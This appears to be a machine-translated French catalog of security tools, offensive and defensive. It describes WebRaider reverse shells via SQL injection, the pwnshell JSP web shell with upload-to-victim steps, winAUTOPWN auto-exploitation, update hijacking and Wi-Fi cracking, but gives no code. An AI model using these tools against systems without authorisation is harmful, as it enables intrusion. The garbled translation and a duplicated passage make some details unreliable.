WebInject est un outil gratuit pour les tests automatisés d’applications Web et services Web. Il peut être utilisé pour tester différents composants du système qui ont des interfaces HTTP (JSP, ASP, CGI, PHP, AJAX, Servlets, les formulaires HTML, XML / SOAP Web Services, REST, etc), et peut être utilisé comme un harnais de test pour créer une suite de [HTTP niveau] fonctionnels automatisés, d’acceptation, et des tests de régression. Un atelier de test vous permet d’exécuter de nombreux cas de test et de recueillir / rapport de vos résultats. WebInject offre en temps réel l’affichage des résultats et peut également être utilisé pour surveiller les temps de réponse du système.

WebInject peut être utilisé comme un cadre de test complet qui est contrôlée par l’interface WebInject utilisateur (GUI). Eventuellement, il peut être utilisé comme un lanceur de test autonome (text / application console) qui peut être intégré et appelée à partir de cadres d’autres tests ou des applications.

WebRaider est un plugin basé outil automatisé d’exploitation des applications web qui se concentre pour obtenir un shell à partir de cibles multiples ou point d’injection.

Idée de cette attaque est très simple. Obtenir un shell inverse d’une injection SQL avec une demande sans l’aide d’un canal supplémentaire comme TFTP, FTP pour transférer la charge initiale.

* C’est une seule demande donc plus rapide,
* Simple, vous n’avez pas besoin d’un outil, vous pouvez le faire manuellement à l’aide de votre navigateur ou une simple approximation MITM,
* Il suffit de copier coller de la charge utile,
* CSRF (pouvoir), Il est possible de concevoir un lien et de réaliser une attaque de type CSRF qui vous donnera une coque arrière,
* Il n’est pas fixe, vous pouvez modifier la charge utile,
* Elle est courte, généralement pas plus de 3.500 caractères,
* Ne nécessite pas de demande sur le système cible, comme FTP, TFTP ou debug.exe,
* Facile à automatiser.


En interne WebRaider utilise Metasploit. Les auteurs utilisent une version spécifique de Metasploit, mais ils ont réduit la graisse de Metasploit pour le lancer plus rapidement et le rendre plus petit. Vous pouvez changer les chemins et le faire fonctionner avec la dernière Metasploit de votre propre installation.

A noter également en raison de l’obus inverse et composants Metasploit ce logiciel sera détecté un virus par le logiciel AV

X5 est un addon Fiddler qui vise à aider les testeurs de pénétration dans la recherche cross-site scripting vulnérabilités. Il injecte ASCII pour trouver des problèmes d’encodage traditionnelles, et il injecte des caractères spéciaux Unicode et les encodages de déterminer où les filtres XSS peut être contourné. Par auto-injection caractère spécial-sondes dans tous les X5 entrées permet de détecter lorsque le caractère émis peut être mal codé ou transformé d’une manière vulnérables. La méthodologie utilisée par X5 est d’injecter de petites sondes qui ne constituent pas une charge de travail XSS. En d’autres termes, X5 sera pas injecter des charges utiles XSS nulle part, elle vise simplement à identifier les problèmes d’encodage de caractères et de transformation qui conduisent à des XSS.

actes X5 en tant qu’assistant au testeur de sécurité en accélérant le processus de manipulation des paramètres et l’agrégation des résultats pour un affichage rapide. Il automatise une partie des travaux préliminaires des tests XSS en énumérant et en injectant des canaris dans tous les domaines d’entrée / paramètres envoyés à une demande et d’analyser comment ces canaris ont été émises plus tard.Par exemple, A été la sortie émis codé en toute sécurité ou non? Avez-un caractère injecté transformer en quelque chose d’autre?

X5 ne pas injecter des charges utiles XSS – il ne tente pas d’exploiter ou de confirmer une vulnérabilité XSS. Il est conçu pour attirer votre attention sur les champs et les paramètres qui semblent des candidats probables à la vulnérabilité. Un testeur de sécurité examinera les résultats pour trouver des questions où les caractères spéciaux ont été dangereusement transformé ou émis sans un codage en toute sécurité. Cela peut être fait rapidement par les résultats d’analyse, qui ont été conçus avec l’intention de fournir une inspection visuelle rapide. Résultats filtres sont également inclus pour le testeur peut simplement cliquer hotspots spectacle à voir que les zones à problème potentiel. Après avoir identifié un hotspot c’est le travail du testeur pour effectuer la validation et des tests supplémentaires XSS.

Les types de cas de test qui X5 comprend:

1. des cas de test traditionnelles – les caractères généralement utilisés pour tester l’injection XSS tels que <,>, « , et » qui sont utilisés pour le contrôle HTML, CSS, javascript ou;
2. des cas de test transformable – caractères qui pourraient les majuscules, minuscules, Normaliser, la carte la mieux adaptée, ou autrement transformer complètement caractères différents, par exemple turc «je» qui sera en minuscule pour «i» dans le logiciel conscient de la culture.
3. Trop long UTF-8 cas d’essai – non plus court-codages UTF-8 de la « traditionnelle » des cas de test mentionné ci-dessus. Par exemple, le <ASCII est 0x3C normalement et 0xC0 0xBC dans le plus court de forme non UTF-8.

Sans fil

Aircrack-ng est un WEP 802.11 et les clés WPA-PSK programme de craquage qui peut récupérer les clés une fois assez de paquets de données ont été capturés. Il met en œuvre le standard FMS attaque avec quelques optimisations telles que des attaques KoreK, ainsi que l’attaque tous les nouveaux-PTW, ce qui rend l’attaque beaucoup plus rapide par rapport aux autres outils de craquage WEP. En fait, Aircrack-ng est un ensemble d’outils pour les réseaux sans fil d’audit.

FireShepherd ~ gas15/FireShepherd /
FireShepherd, un petit programme console qui inonde le réseau sans fil à proximité avec des paquets conçu pour éteindre FireSheep, effectivement fermer à proximité programmes FireSheep toutes les 0,5 secondes, ou alors, vous faire et les gens autour de vous à l’abri de la plupart des gens utilisant FireSheep.
Le programme tue la version actuelle de FireSheep qui coulait tout près, mais l’utilisateur est toujours en danger de toutes les sessions d’autres mécanismes de détournement. Ne pas faire n’importe quoi sur un réseau non sécurisé que vous ne pouvez pas partager avec tout le monde.
-Sachez que ce n’est qu’une solution temporaire au problème FireSheep, créé pour donner aux gens la chance de se sécuriser et les autres autour d’eux de la menace actuelle, alors que les failles de sécurité révélées par FireSheep sont fixes.

Facultatif commutateurs de ligne de commande:
-I * IP * IP de destination pour les paquets, routeur local est recommandé. (Un serveur facebook trivial est par défaut)
Le routeur local peut être consultée par la commande tracert. (Par exemple le premier coup de «tracert &raquo;)
-T timeout * * timeout en ms pour l’envoi de paquets. Environ 200 est ok pour un routeur local. (400 par défaut)
-H Affiche ce message

universelle renifleur de clavier sans fil: Keykeriki. Ce projet opensource de matériel et de logiciels permet à chaque personne afin de vérifier le niveau de sécurité de leurs transmissions propre clavier et / ou démontrer les attaques sniffing (à des fins éducatives seulement). Le matériel lui-même est conçu pour être petit et polyvalent, il peut être étendu à l’heure actuelle détectés / trafic clavier inconnu, et / ou matériel extensions, par exemple, un module de répéter ou de l’amplificateur

KisMAC wiki! KisMAC est un open-source et gratuit sniffer / scanner d’applications pour Mac OS X. Il a un avantage sur MacStumbler / iStumbler / NetStumbler en ce qu’il utilise le mode de surveillance et de balayage passif.

KisMAC supporte plusieurs tiers cartes PCMCIA: Orénoque, PrismII, Cisco Aironet, Atheros et PrismGT. périphériques USB avec Intersil Prism2, Ralink rt2570 et rt73, et Realtek RTL8187 chipsets sont en cours vers un soutien complet ainsi. Tout le matériel AirPort interne est prise en charge pour la numérisation.

Wi-Feye peut être considéré comme une interface graphique pour presque tous les outils que nous utilisons tous les jours. Il est conçu pour être l’outil ultime point-and-shoot. Wi-Feye vous permettra d’effectuer un certain nombre de puissantes attaques automatiquement. Tout ce que vous avez à faire est de lancer une connexion Wi-Feye, choisissez qui attaquent à exécuter, sélectionnez votre cible et laissez Wi-Feye faire de la magie! Donc, vous voyez qu’il est conçu pour aider à tester la pénétration du réseau, de reconnaissance, etc

Wi-Feye est divisé en quatre menus principaux:

1. Cracking menu: Ce menu vous permettra de:
Activer le mode de surveillance
Afficher les réseaux sans fil.
Lancement airodump-ng sur un thème particulier AP
Craquage WEP: Cela vous permettra d’effectuer automatiquement les attaques suivantes:
* Rediffusion paquet Interactive.
* Attaque d’authentification Fake.
* Attaque chopchop Korek.
* Une attaque par fragmentation.
* Hirte Attack (attaque cfrag).
* Wesside-ng.

WPA Cracking: Celui-ci contient les attaques suivantes:
Attaque Wordlist *
* Attaque AP Rouge
2. Cartographie: Ce menu vous permettra de faire ce qui suit:
Scan le réseau et afficher les hôtes connectés
Utiliser Nmap automatiquement
3. MITM: Ce menu vous permettra de faire ce qui suit automatiquement:
Activer le routage IP
ARP Spoof
Lancement ettercap (mode texte).
Sniff SSL / HTTPS trafic.
URL de Sniff et de les envoyer au navigateur.
Sniff messagers de messageries instantanées.
Sniff images.
DNS frauduleux.
Session Hijacking HTTP (en utilisant Hamster).
4. Autres: Ce menu vous permettra de faire ce qui suit automatiquement:
Changement d’adresse MAC.
mises à jour logicielles Hijack (à l’aide Evilgrade).

A l’heure actuelle, vous devez avoir déjà vu pourquoi nous avons dit qu’il est une interface graphique pour différents outils. Il peut être considéré comme un simple wrapper Python pour différents outils. Le fichier vous aidera à intégrer la liste suivante des outils nécessaires pour chaque module:

* Aircrack-ng est nécessaire pour toutes les attaques dans le menu de craquage
* Nmap est utilisé dans le menu de Nmap.
* Ettercap est très important car il est utilisé dans les attaques suivantes:

1. ARP Spoofing.
2. SSL / HTTPS reniflement.
3. URL sniffing.
4. DNS Spoofing.
5. Image sniffing.

* Msgsnarf d’intercepter les messages de la messagerie instantanée.
* Hamster pour le détournement de session HTTP
* Attendez-vous et Evilgrade pour détournement de logiciels.

Par exemple, si vous voulez détourner mises à jour logicielles dans le réseau, tout ce que vous avez à faire est de sélectionner le logiciel que vous souhaitez pour détourner sa mise à jour, sélectionnez une charge utile, sélectionnez la cible et c’est tout! Wif-Eye va utiliser Metasploit de créer et de chiffrer l’agent, début multi / gestionnaire, arrêter le Apache si elle est déjà en cours d’exécution, démarrez le serveur DNS frauduleux evilgrade et les mises à jour evilgrade! C’est aussi simple que cela!

WiPhire est un script Bash visant à rendre le processus Wireless Hacking beaucoup plus facile. Ce script a été écrit sur Backtrack 4 et conçu pour être utilisé avec Backtrack 4. Ce script a été également conçu pour être utilisé avec l’adaptateur sans fil Alfa AWUS036H avec le chipset RTL8187. Si vous n’avez pas ce chipset, mais une autre carte qui est compatible avec la suite aircrack-ng vous aurez besoin de le mettre en mode moniteur avant d’exécuter le script si vous souhaitez utiliser une option qui doit suivre le mode activé. Ce script doit être exécuté en tant que root.

Ce sont les fonctions du script:

* Spoofer autoMACtic MAC
* Capacité de crack réseaux WEP
* Capacité de crack WPA des réseaux
* Effectuer simple attaques MITM
* Dnsspoof un réseau
* Utilisez largage-ng pour créer un brouilleur

Programmes qui utilise WiPhire:

* Airmon-ng
* Airodump-ng
* Aireplay-ng
* Aircrack-ng
* Largage-ng
* Xterm
* Crunch
* Pyrit
* Sslstrip
* Arpspoof
* Macchanger
* Kate
* Apache2
* Ettercap
* Firefox

Considérez Grimwepa un front-end à de nombreux auditeurs célèbre Wired Equivalent Privacy (WEP) et Wi-Fi Protected Access mot de passe (WPA). Nous n’avons pas été en mesure d’utiliser celle-ci comme nous l’avons été très occupés avec les différentes missions.Mais, encore ce mérite une mention.

Grimwepa est un cracker de mot de passe pour les deux WEP et WPA-points d’accès crypté (routeurs). Il est écrit en Java et est destiné à être utilisé avec le système d’exploitation Linux, plus précisément pour la distribution de BackTrack. Il n’a que deux modes: points d’accès Crack WEP crypté (routeurs) et le crack des points d’accès WPA-crypté. Il peut rechercher de nouvelles cibles, et sélectionne automatiquement votre méthode de fissuration! A peu près tout est fait pour vous.

geeks authentique, qu’ils soient professionnels ou occasionnels, ont besoin d’outils Wi-Fi qui permettent réseaux WLAN dépanner. Avec inSSIDer, MetaGeek a créé un cadeau qui continue à donner. Notre technologie primée, open-source Wi-Fi logiciel du scanner, inSSIDer, est une alternative aux scanners réseau comme NetStumbler. Une grande différence: inSSIDer travaille en fait avec Windows Vista, Windows 7, et 64-bit PC.

inSSIDer est gratuit, open-source Wi-Fi logiciel de numérisation. Et pourtant, vous voulez en savoir plus. Wow. vous êtes vraiment notre type de geek. Jetez un oeil à des caractéristiques ci-dessous pour voir ce qui fait inSSIDer spéciale.
Ce qui est unique inSSIDer?

* Compatible avec Windows XP, Vista et 7 (32 et 64-bit)
* Utilise le Native Wi-Fi API et votre carte actuelle du réseau sans fil
* Trier les résultats par adresse MAC, SSID, canal, RSSI et «Last Time Vu »
* Compatible avec la plupart des appareils GPS (NMEA v2.3 et supérieur)

Comment peut-inSSIDer m’aider?

* Inspectez votre WLAN et les réseaux environnants pour résoudre les points d’accès concurrents
* Suivre la force du signal reçu en dBm au fil du temps
* Points d’accès dans un filtre facile à utiliser le format
* Mise en évidence des points d’accès pour les zones à concentration Wi-Fi haut
* Exportation Wi-Fi et des données GPS dans un fichier KML pour visualiser dans Google Earth.
* Filtrer à travers des centaines de points d’accès numérisé

Cet outil automatise quelques-unes des tâches que vous pourriez avoir besoin sur un test de pénétration (sans fil) ou pendant que vous êtes en déplacement. Il vise à être un outil polyvalent pour:

* Se connecter à des points d’accès différents avec des compétences différentes facile à utiliser avec des fichiers de configuration
* Exécuter un mal / point d’accès non autorisés (Karma, Karmetasploit)
* Pouvoirs Sniff (dsniff suite, sslstrip)
* Pouvoirs Hamster (Wifizoo, Ferret, Hamster)
* Test de cryptage WEP (Wepbuster)
* Mettre en place des connexions sécurisée dans des environnements hostiles (le tunnel SSH, OpenVPN, DNS Tunnel)
* Installation et mise à jour des logiciels requis

Rédigé pour la disto de sécurité Backtrack, largement testé sur BT4 final en particulier, également en cours d’exécution sur Ubuntu 9.10, mais pourrait fonctionner sur les systèmes d’autres, aussi.

BinPack est un environnement de sécurité portable pour Windows.Grâce à des outils de sécurité 100 + dans le référentiel, vous pouvez facilement convertir n’importe quel système dans une plate-forme de piratage en quelques minutes.

Honggfuzz est un outil de fuzzing à des fins générales. Étant donné un corpus à partir de fichiers de test, de fournitures et modifie Hongfuzz entrée à un programme de test et d’utiliser les ptrace () API / interface signal POSIX de détecter et d’enregistrer les accidents.

Fondamentalement, il s’agit d’un simple, facile à utiliser via l’interface de ligne de commande, en fournissant des analyses des accidents de la belle logiciel sous une forme simple de noms de fichiers.

Il a été utilisé pour trouver un peu (peut-être exploitable) bugs dans certains logiciels majeurs, y compris freetype2, librsvg et libtiff.


* Installation facile: Aucun fichier de configuration ou d’installation compliquée nécessaires – Hongfuzz peut être exécuté directement à partir de la ligne de commande.
* Rapide: multiples instances Hongfuzz peuvent être exécutées simultanément pour fuzzing plus efficace.
* Puissantes capacités d’analyse: Hongfuzz utilisera l’analyse des processus les plus puissants de l’État (ptrace par exemple) sous une interface donnée OS.

IKAT a été conçu pour aider les consultants en sécurité avec la tâche de vérification de la sécurité d’un terminal Windows Kiosque sur Internet. ikat est conçu pour fournir un accès au système d’exploitation sous-jacent d’un terminal de kiosque en invoquant natif OS fonctionnalité. Cet outil devrait être (et est) utilisé par les vendeurs Kiosque / développeurs / fournisseurs pour tester la sécurité de leurs produits propre kiosque.

Conçu comme un SaaS, IKAT caractéristiques de nombreuses méthodes de s’échapper d’un environnement de navigateur emprisonné et obtenir l’exécution de commandes. ikat est un site Web que vous visitez à partir d’un kiosque, son rapide, gratuit et vise à s’il vous plaît. ikat est uniquement développé par moi-même (Paul Craig) un passionné de Kiosque le piratage de la Nouvelle-Zélande.

Quoi de neuf dans IKAT v3

Signé Code
Tous les outils ikat, VBScripts, ActiveXs, ClickOnce, les applications Silverlight sont désormais signé par une autorité digne de confiance! Il ya quatre mois j’ai placé un « Donate Now » sur la page d’accueil de l’ikat, dans l’espoir d’amasser des fonds pour un certificat de signature de code Malheureusement seulement deux personnes ont donné de trésorerie (Enrique Martinez Exposito et Gerald Fehringer, vous les gars rock) Heureusement, un vendeur de kiosque a été prêts à venir à la fête et de donner l’argent restant. Un grand merci à Kioware kiosques, qui ont aimablement fait don du reste de l’argent. Tous les outils sont maintenant IKAT signé par une AC de confiance.

Autres outils
IKAT contient maintenant plus d’outils emballés dans des contenants différents, des formats de fichier, au format PDF, et même les installateurs silencieux. Applets Java Plus, Plus VBScript, WMI Plus!

IKAT ActiveX
Un nouveau ActiveX qui se concentre sur Windows Shell piratage et processus de reproduction. L’ActiveX est signé et fournit une quantité folle de fonctionnalité.

Merci à Didier Stevens qui avait donné son « Excel Spawn CMD en mémoire » astuce pour le projet IKAT OfficeKAT vous permet de pop shell dans des environnements où vous pouvez exécuter Excel, qui plus est vous n’avez pas besoin d’écrire sur le système de fichiers.

IKAT SilverLight
SilverLight (et mono) sont désormais pris en charge par ikat, et de fournir encore un autre vecteur d’attaque pour votre plaisir

Amélioration de recensement gestionnaire d’URI + Dossier
Largement code d’énumération améliorée, plus URI, plus instantanée « Une magie cliquez sur ». J’ai également ajouté le support certaines des plus intéressantes en fonction des vulnérabilités Microsoft gestionnaire d’URI sorti cette année.

Kiosking Emo – Crashing le Kiosque
Le moyen le plus rapide de sortir de prison un environnement de navigateur est simple, il CRASH. Curieusement c’est aussi la meilleure chose à faire à un navigateur, et Emo-Kiosking est devenu un truc favori personnel de la mine. IKAT prend désormais en charge plus de 60 méthodes différentes de s’écraser un navigateur ou un navigateur add-on Cela vous permet de rapidement retomber sur le bureau, souvent avec un seul clic requis.

Pour utiliser ikat il suffit de visiter l’URL suivante dans un navigateur système de kiosque:

PRN-2-moi, c’est un simple auditeur qui peut être configuré pour fonctionner sur n’importe quel port (par défaut est 9100 pour les connexions style jetdirect). L’outil sera ensuite enregistrer tous les appels entrants PCL et les travaux d’impression PostScript de déposer et de les transmettre à l’imprimante réelle.

Que faites-vous lorsque vous avez un fichier arbitraire télécharger vers un répertoire accessible sur le Web en J2EE? De toute évidence, vous avez besoin d’une coquille JSP! Mais il ya un problème: celles qui sont disponibles sont des sortes de terrible. Le Metasploit shell inverse est seulement destiné à servir d’espace réservé pour une boîte de déjà-propriété. Le monde a besoin d’un shell JSP qui aide vraiment un pivot attaquant blackbox à d’importants atouts, alors j’ai pris un coup de poignard à elle. C’est ce qu’on appelle assez maladroitement appelé pwnshell.

Qu’est-ce que c’est?
Un seul fichier JSP, incorporé avec jQuery et tout le reste vous avez besoin de faire une coquille web génial.

Comment l’utilisez-vous?
1. le télécharger sur le serveur de la victime (l’essayer sur un serveur Tomcat locale!)
2. Parcourir pour le
3. Imaginez que vous êtes en regardant xterm

D’où vient-il?
– Fonctionne sur plate-forme
– Fonctionne sur Java 1.5 + (sans doute 1,4 trop, mais je n’ai pas testé)

Pourquoi voudriez-vous l’utiliser?
– Naviguez à travers le système (comme l’utilisateur du système d’applications Web)
– Exécuter des commandes arbitraires du système (c’est un shell, après tout)
– Afficher et modifier les variables de session
– Dump entrées JNDI

Autohack vos cibles avec une interaction moins possible.


– Contient déjà compilés par les exécutables d’exploits célèbres et efficaces alongwith quelques exploits d’origine.
– Pas besoin de déboguer un script ou de compiler le code source.
– Scanne tous les ports 1 à 65535 après avoir pris l’adresse IP et tente tous les exploits possibles en fonction de la liste des ports ouverts découvert (OpenPorts.TXT)
– PortScan est multi-thread.
– Ne nécessite pas de base de données à l’arrière-end comme les autres
– Peut être également être utilisé pour tester l’efficacité des IDS / IPS
– Lancé exploits sont indépendants et ne reposent pas sur les empreintes digitales de service (pour éviter l’évasion, le cas échéant)

L’objectif de la création winAUTOPWN n’est pas de rivaliser avec les cadres déjà existants commerciaux comme Core Impact (Pro), immunité toile, Metasploit Framework (freeware), etc autohacks offre, mais de créer un gratuit, rapide, application autonome qui est facile àutilisation et ne nécessite pas beaucoup de soutien des autres dépendances.
A ne pas oublier que contrairement winAUTOPWN autres cadres maintient code source de l’écrivain d’origine exploiter intact tel qu’il était et qu’il utilise. De cette façon, l’exploit de crédit écrivain et l’originalité est maintenue. La source est modifiée uniquement lorsque nécessaire pour permettre une fonctionnalité manquante ou à éliminer les limitations codé en dur. Dans ces conditions également, l’exploit crédits écrivain restent intacts.

Les nouveaux modules d’exploit sont ajoutés au fur et à libérer et les plus âgés sont également ajoutés tous les jours.
Les binaires de perl, php, python et les DLL Cygwin (inclus) sont requis pour exister soit dans un dossier commun ou devrait être installé correctement avec leurs chemins enregistrés pour ces exploits qui sont ne peuvent pas être compilés dans un PE-exe.

Certains anti-virus peut détecter à tort les exploits comme malveillants.

Autohack vos cibles avec une interaction moins possible.


– Contient déjà compilés par les exécutables d’exploits célèbres et efficaces alongwith quelques exploits d’origine.
– Pas besoin de déboguer un script ou de compiler le code source.
– Scanne tous les ports 1 à 65535 après avoir pris l’adresse IP et tente tous les exploits possibles en fonction de la liste des ports ouverts découvert (OpenPorts.TXT)
– PortScan est multi-thread.
– Ne nécessite pas de base de données à l’arrière-end comme les autres
– Peut être également être utilisé pour tester l’efficacité des IDS / IPS
– Lancé exploits sont indépendants et ne reposent pas sur les empreintes digitales de service (pour éviter l’évasion, le cas échéant)

L’objectif de la création winAUTOPWN n’est pas de rivaliser avec les cadres déjà existants commerciaux comme Core Impact (Pro), immunité toile, Metasploit Framework (freeware), etc autohacks offre, mais de créer un gratuit, rapide, application autonome qui est facile àutilisation et ne nécessite pas beaucoup de soutien des autres dépendances.
A ne pas oublier que contrairement winAUTOPWN autres cadres maintient code source de l’écrivain d’origine exploiter intact tel qu’il était et qu’il utilise. De cette façon, l’exploit de crédit écrivain et l’originalité est maintenue. La source est modifiée uniquement lorsque nécessaire pour permettre une fonctionnalité manquante ou à éliminer les limitations codé en dur. Dans ces conditions également, l’exploit crédits écrivain restent intacts.

Les nouveaux modules d’exploit sont ajoutés au fur et à libérer et les plus âgés sont également ajoutés tous les jours.
Les binaires de perl, php, python et les DLL Cygwin (inclus) sont requis pour exister soit dans un dossier commun ou devrait être installé correctement avec leurs chemins enregistrés pour ces exploits qui sont ne peuvent pas être compilés dans un PE-exe.

Certains anti-virus peut détecter à tort les exploits comme malveillants.

Cheat Sheets

Common Ports
NMAP triche eng v1.pdf
Guide du test de l’OWASP
Filtres d’affichage Wireshark

Anti Meterpreter
Antimeter est un outil très utile pour les administrateurs de la sécurité intérieure qui permet de numériser leurs systèmes de session Meterpreter reste après qu’ils ont réussi à exploiter un système de Metasploit.

Arpon (Arp inspection gestionnaire) est un démon gestionnaire portables qui font Arp sécurisé afin d’éviter ARP Spoofing / Empoisonnement & co.

Cela est possible en utilisant deux types de tecniques anti ARP poisoning, le premier est basé sur SARPI ou «ARP statique d’inspection », le second sur DARPI ou «dynamique Arp inspection » approche.

Gardez à l’esprit d’autres outils communs lutte contre l’empoisonnement ARP limitent généralement leur activité uniquement pour souligner le problème au lieu de la bloquer, il ne Arpon utilisant politiques SARPI et DARPI. Enfin, vous pouvez utiliser Arpon à pentest certains commuté / LAN hubbed avec / sans protocole DHCP, en fait, vous pouvez désactiver le démon afin de pouvoir utiliser les outils pour empoisonner le cache ARP.

Rappelez-vous qu’il n’affecte pas l’efficacité de la communication du protocole ARP!

– Il remplace Arpwatch & co; blocs Arpon;
– Il détecte et bloque Arp Empoisonnement / Spoofing des attaques dans les réseaux configurés de manière statique;
– Il détecte et bloque Arp Empoisonnement / Spoofing attentats dynamiquement configuré (DHCP) des réseaux;
– Il détecte et bloque les attaques unidirectionnelles et bidirectionnelles;
– Il gère l’interface réseau dans le débrancher, de démarrage, d’hibernation et de suspension caractéristiques OS;
– Facilement configurable via des commutateurs de ligne de commande, à condition que vous avez les permissions root;
– Il travaille en espace utilisateur pour des raisons de portabilité OS;
– Testé contre Ettercap, Cain & Abel, dsniff et d’autres outils.


Gateway Astaro Security
L’édition essentielles Firewall fournit une protection pour les adresses IP illimitée et les fonctions suivantes, sans limitations de temps:
– Mise en réseau: routeur Internet, Par-delà, le serveur DNS et proxy, DynDNS, serveur DHCP et relais, le soutien NTP, QoS automatique
– Réseau de la sécurité: pare-feu Stateful Packet Inspection & Network Address Translation (DNAT / SNAT / Masquerade)
– Accès à distance: PPTP et L2TP sur IPSec de soutien (y compris le soutien iPhone)
– Journaux / Rapports: la pleine exploitation forestière sur le disque dur local, la recherche, des rapports en temps réel pour le matériel, l’utilisation du réseau et la sécurité des réseaux, des rapports quotidiens de direction
– Gestion: Interface utilisateur graphique Web dans les langues locales, l’assistant d’installation, de configuration de sauvegarde et de restauration, les notifications d’administrateur, le support SNMP, gestion centralisée via Astaro Command Center (également gratuit)

Quelles plateformes sont supportées par le Firewall Edition essentielles?

Le logiciel pare-feu essentielles est disponible sous forme de logiciels et appliance virtuelle. Les deux versions offrent l’ensemble des fonctionnalités identiques et comprennent un système linux durci exploitation.

* L’appareil logiciel peut être installé soit sur un PC dédié Intel ™ compatible ou dans une machine virtuelle.
* L’appliance virtuelle peut être exécuté directement en tout VMware vSphere Edition

Exécution d’un Astaro Security Gateway sur une machine virtuelle protège votre environnement à deux reprises:

* La communication externe – La défense contre les menaces provenant d’Internet, par exemple Chevaux de Troie et les virus
* La communication inter-VM – contrôle et surveille les données de trafic entre les machines virtuelles

GreenSQL est un pare-feu Open Source base de données utilisée pour protéger les bases de données contre les attaques par injection SQL. GreenSQL fonctionne comme un proxy pour les commandes SQL et dispose du support pour MySQL.


OSSEC est une solution évolutive, multi-plateforme, open source basé sur l’hôte Intrusion Detection System (HIDS). Il a une forte corrélation et moteur d’analyse, l’intégration de l’analyse des journaux, vérification de l’intégrité du fichier, de surveillance du registre Windows, l’application de la politique centralisée, détection des rootkits, alertes en temps réel et la réponse active.

Patriot NG
Patriot est un outil de « Host IDS » qui permet de surveiller en temps réel des modifications des systèmes Windows ou des attaques réseau.

Patriot moniteurs:

* Variations de clés de registre: Indiquant si une touche sensible (autorun, paramètres d’Internet Explorer …) est altérée.
* Nouveaux fichiers dans les répertoires « Démarrage »
* Nouveaux utilisateurs dans le système
* Services Nouveau-installé
* Les changements dans le fichier hosts
* De nouveaux emplois prévus
Modification * de l’intégrité d’Internet Explorer: (New BHO, les changements de configuration, nouvelles barres d’outils)
* Les variations dans le tableau ARP (prévention d’attaques MITM)
* L’installation de nouveaux pilotes
* Les actions New Netbios
* TCP / IP de la Défense (Nouveaux ports ouverts, de nouvelles connexions faites par des procédés, la détection PortScan …)
* Les fichiers dans les répertoires critiques (les nouveaux executables, nouvelles DLL …)
* Les nouvelles fenêtres cachées (cmd.exe / Internet Explorer en utilisant des objets OLE)
* Netbios connexions au système
* ARP Watch (New hôtes dans votre réseau)
* NIDS (trafic anormal Détecter réseau fondé sur des règles modifiables)

Le moteur est un Suricata Open Source Next Generation de détection d’intrusion et de prévention du moteur. Ce moteur n’est pas destiné à remplacer à imiter ou les outils existants dans l’industrie, mais ils apporteront de nouvelles idées et technologies sur le terrain.

OISF fait partie et financé par le ministère de la Direction de la Sécurité intérieure pour la science et de la technologie Programme d’accueil (Homeland Open Security Technology), en l’espace de la Marine et des Systèmes Navals de Warfare Command (SPAWAR), ainsi que grâce au soutien généreux de l’ membres du Consortium OISF. Plus d’informations sur le Consortium est disponible, ainsi que la liste de nos membres actuels du consortium.

Le moteur de Suricata et la Bibliothèque HTP sont disponibles à utiliser en vertu de la GPLv2.

La Bibliothèque HTP est un normalisateur HTTP et analyseur écrit par Ivan Ristic du Mod de sécurité pour la gloire OISF. Cette intègre et assure un traitement très avancé de flux HTTP pour Suricata. La bibliothèque HTP est requise par le moteur, mais peut également être utilisé indépendamment dans une large gamme d’applications et d’outils.

Le système anti-intrusion Samhain basé sur l’hôte de détection (HIDS) fournit une vérification d’intégrité des fichiers et le suivi fichier journal / analyse, ainsi que la détection de rootkit, la surveillance des ports, la détection des exécutables SUID voyous, et les processus cachés.

Samhain été conçu pour surveiller des hôtes multiples systèmes d’exploitation potentiellement différent, offrant la journalisation centralisée et la maintenance, mais il peut aussi être utilisé comme application autonome sur un seul hôte.

A propos de Beltane

Beltane est un système de gestion basé sur le Web la console centrale de l’intégrité du fichier Samhain / système de détection d’intrusion. Il permet à l’administrateur de parcourir les messages des clients, les reconnaître, et mettre à jour les bases de données stockées de manière centralisée de fichiers de signatures.

Comme le démon Samhain garde un souvenir des modifications apportées aux fichiers, la base de signatures de fichiers ne doivent être à jour lors du redémarrage du démon et des téléchargements à partir de la base de données du serveur central. Beltane vous permet d’utiliser les informations enregistrées par le client pour mettre à jour la base de signatures.

Snorby est un nouveau et moderne Snort IDS avant la fin. Les concepts de base fondamentale derrière snorby sont la simplicité et la puissance. L’objectif du projet est de créer un libre, open source et l’application hautement concurrentiel de la surveillance du réseau à la fois pour un usage privé et des entreprises.


PacketFence est un contrôle de code source libre et ouverte d’accès au réseau (NAC). PacketFence est activement maintenu et a été déployé dans de nombreuses institutions de grande envergure au cours des dernières années. Il peut être utilisé pour sécuriser efficacement les réseaux – de la petite à très grands réseaux hétérogènes.

OpenDLP est une source libre et ouverte, à base d’agents, gérés de manière centralisée, massivement outil distribuable de prévention des pertes de données sous licence GPL. Compte tenu des justificatifs de domaine Windows, OpenDLP peut identifier simultanément les données sensibles au repos sur des centaines ou des milliers de systèmes Microsoft Windows à partir d’une application Web centralisée. OpenDLP a deux composantes: une application web et d’un agent.

Application Web

* Déployer automatiquement et commencer agents sur NetBIOS
* Lorsque vous avez terminé, arrêter automatiquement, désinstaller et supprimer des agents sur NetBIOS
* Suspendre, reprendre, avec force et désinstaller les agents dans un ensemble de numériser ou sur des systèmes individuels
* Parallèlement et en toute sécurité recevoir les résultats de centaines ou de milliers d’agents déployés sur deux voies de confiance connexion SSL
* Créer compatibles Perl des expressions régulières (PCREs) pour trouver des données sensibles au repos
* Créer des profils réutilisables pour les analyses qui incluent les répertoires liste blanche ou liste noire et les extensions de fichier
* Examiner les conclusions et d’identifier les faux positifs
* Résultats à l’exportation au format XML
* Écrit en Perl avec MySQL backend


* Fonctionne sur Windows 2000 et versions ultérieures
* Ecrit en C, sans autre condition. NET Framework
* Fonctionne comme un service Windows à faible priorité afin que les utilisateurs ne voient pas ou se sentent
* Reprend automatiquement au redémarrage du système sans interaction de l’utilisateur
* Transmettre en toute sécurité des résultats de l’application web à des intervalles définis par l’utilisateur sur deux voies de confiance connexion SSL
* PCREs utilise pour identifier les données sensibles contenues dans les fichiers
* Effectuer des vérifications supplémentaires sur le potentiel de numéros de carte de crédit pour réduire les faux positifs

Scannedonly est un module Samba VFS et un démon à balayage qui garantissent que seuls les fichiers qui ont été scannés pour les virus sont visibles et accessibles à l’utilisateur final.

